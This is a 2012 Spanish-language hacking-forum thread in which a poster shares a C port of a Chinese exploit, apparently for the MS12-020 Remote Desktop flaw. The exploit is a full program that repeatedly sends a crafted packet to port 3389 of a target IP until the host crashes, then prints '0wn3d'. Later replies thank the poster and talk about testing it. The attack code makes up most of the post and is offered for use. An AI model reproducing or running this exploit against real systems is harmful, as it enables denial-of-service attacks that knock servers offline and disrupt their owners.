Indetectables

Publicado: **16 Mar 2012, 14:57**

Bueno, solamente hice una traduccion a C ...y alguna que otra modificacion de un exploit chino que explota una de las ultimas vulnerabilidades públicas conocidas de Windows, cuando éste tiene el puerto abierto 3389 (escritorio remoto), sin mas dejo el original en python y su traduccion a C

Mostrar/Ocultar

Código: Seleccionar todo

#include "stdio.h"
#include "winsock2.h"
#pragma comment(lib, "ws2_32.lib")

const char hexosni[580]={0x03,0x00,0x00,0x13,0x0e,0xe0,0x00,0x00,0x00,0x00,0x00,0x01,
0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x01,0xd6,0x02,0xf0,0x80,0x7f,0x65,0x82,
0x01,0x94,0x04,0x01,0x01,0x04,0x01,0x01,0x01,0x01,0xff,0x30,0x19,0x02,0x04,0x00,0x00,
0x00,0x00,0x02,0x04,0x00,0x00,0x00,0x02,0x02,0x04,0x00,0x00,0x00,0x00,0x02,0x04,0x00,
0x00,0x00,0x01,0x02,0x04,0x00,0x00,0x00,0x00,0x02,0x04,0x00,0x00,0x00,0x01,0x02,0x02,
0xff,0xff,0x02,0x04,0x00,0x00,0x00,0x02,0x30,0x19,0x02,0x04,0x00,0x00,0x00,0x01,0x02,
0x04,0x00,0x00,0x00,0x01,0x02,0x04,0x00,0x00,0x00,0x01,0x02,0x04,0x00,0x00,0x00,0x01,
0x02,0x04,0x00,0x00,0x00,0x00,0x02,0x04,0x00,0x00,0x00,0x01,0x02,0x02,0x04,0x20,0x02,
0x04,0x00,0x00,0x00,0x02,0x30,0x1c,0x02,0x02,0xff,0xff,0x02,0x02,0xfc,0x17,0x02,0x02,
0xff,0xff,0x02,0x04,0x00,0x00,0x00,0x01,0x02,0x04,0x00,0x00,0x00,0x00,0x02,0x04,0x00,
0x00,0x00,0x01,0x02,0x02,0xff,0xff,0x02,0x04,0x00,0x00,0x00,0x02,0x04,0x82,0x01,0x33,
0x00,0x05,0x00,0x14,0x7c,0x00,0x01,0x81,0x2a,0x00,0x08,0x00,0x10,0x00,0x01,0xc0,0x00,
0x44,0x75,0x63,0x61,0x81,0x1c,0x01,0xc0,0xd8,0x00,0x04,0x00,0x08,0x00,0x80,0x02,0xe0,
0x01,0x01,0xca,0x03,0xaa,0x09,0x04,0x00,0x00,0xce,0x0e,0x00,0x00,0x48,0x00,0x4f,0x00,
0x53,0x00,0x54,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x01,0xca,0x01,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x07,0x00,0x01,0x00,0x30,
0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x2d,0x00,0x30,0x00,0x30,0x00,0x30,0x00,
0x2d,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x2d,
0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x04,0xc0,0x0c,0x00,0x0d,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0xc0,0x0c,0x00,
0x1b,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0xc0,0x2c,0x00,0x03,0x00,0x00,0x00,0x72,
0x64,0x70,0x64,0x72,0x00,0x00,0x00,0x00,0x00,0x80,0x80,0x63,0x6c,0x69,0x70,0x72,0x64,
0x72,0x00,0x00,0x00,0xa0,0xc0,0x72,0x64,0x70,0x73,0x6e,0x64,0x00,0x00,0x00,0x00,0x00,
0xc0,0x03,0x00,0x00,0x0c,0x02,0xf0,0x80,0x04,0x01,0x00,0x01,0x00,0x03,0x00,0x00,0x08,
0x02,0xf0,0x80,0x28,0x03,0x00,0x00,0x0c,0x02,0xf0,0x80,0x38,0x00,0x06,0x03,0xef,0x03,
0x00,0x00,0x0c,0x02,0xf0,0x80,0x38,0x00,0x06,0x03,0xeb,0x03,0x00,0x00,0x0c,0x02,0xf0,
0x80,0x38,0x00,0x06,0x03,0xec,0x03,0x00,0x00,0x0c,0x02,0xf0,0x80,0x38,0x00,0x06,0x03,
0xed,0x03,0x00,0x00,0x0c,0x02,0xf0,0x80,0x38,0x00,0x06,0x03,0xee,0x03,0x00,0x00,0x0b,
0x06,0xd0,0x00,0x00,0x12,0x34,0x00 };

int main(int argc, char* argv[])
{
    WSADATA wsaData;
    SOCKET hSocket;
    struct sockaddr_in toTest;
    int result;
	
	
    WSAStartup(MAKEWORD(2, 2), &wsaData);
	printf("Testeando %s...", argv[1]);
	for (int i=0;i<1000;i++)
	{
		printf (".");
    hSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    
	if (hSocket == 0) 
		return 0;

    toTest.sin_family = AF_INET;
    toTest.sin_port = htons(3389);
    toTest.sin_addr.s_addr = inet_addr(argv[1]);
    
    result = connect(hSocket, (SOCKADDR*)&toTest, sizeof(toTest));
		if (result != 0) 
		{ 
			if (i>1)
				printf("\n0wn3d");
			else
				printf("\nPuerto Cerrado");
		 
			return 0; 
		}

    result = send(hSocket, hexosni, sizeof(hexosni), 0);
    
	}

	printf("\nNo vulnerable");

    closesocket(hSocket);
    return 1;
	}

Salud

Publicado: **17 Mar 2012, 14:56**

Increíble... tengo que probarlo en casa con alguna de mis "tostadoras"...
Felicidades por tomarte el tiempo de traducirlo a C/C++ y dejarlo para todos aquí...

¡Saludos!...

Publicado: **21 Mar 2012, 17:03**

Bonito código lo pasaré a Java XD

Publicado: **21 Mar 2012, 19:38**

buen aporte bro seguro te habra llevado tu tiempo

Salu2!

que bueno brother

Publicado: **20 Jun 2012, 20:10**

muy bueno, gracias por compartirlo :D

Indetectables

Crash Windows (MS12_020) implementacion en C

Crash Windows (MS12_020) implementacion en C

Re: Crash Windows (MS12_020) implementacion en C

Re: Crash Windows (MS12_020) implementacion en C

Re: Crash Windows (MS12_020) implementacion en C

Re: Crash Windows (MS12_020) implementacion en C

Re: Crash Windows (MS12_020) implementacion en C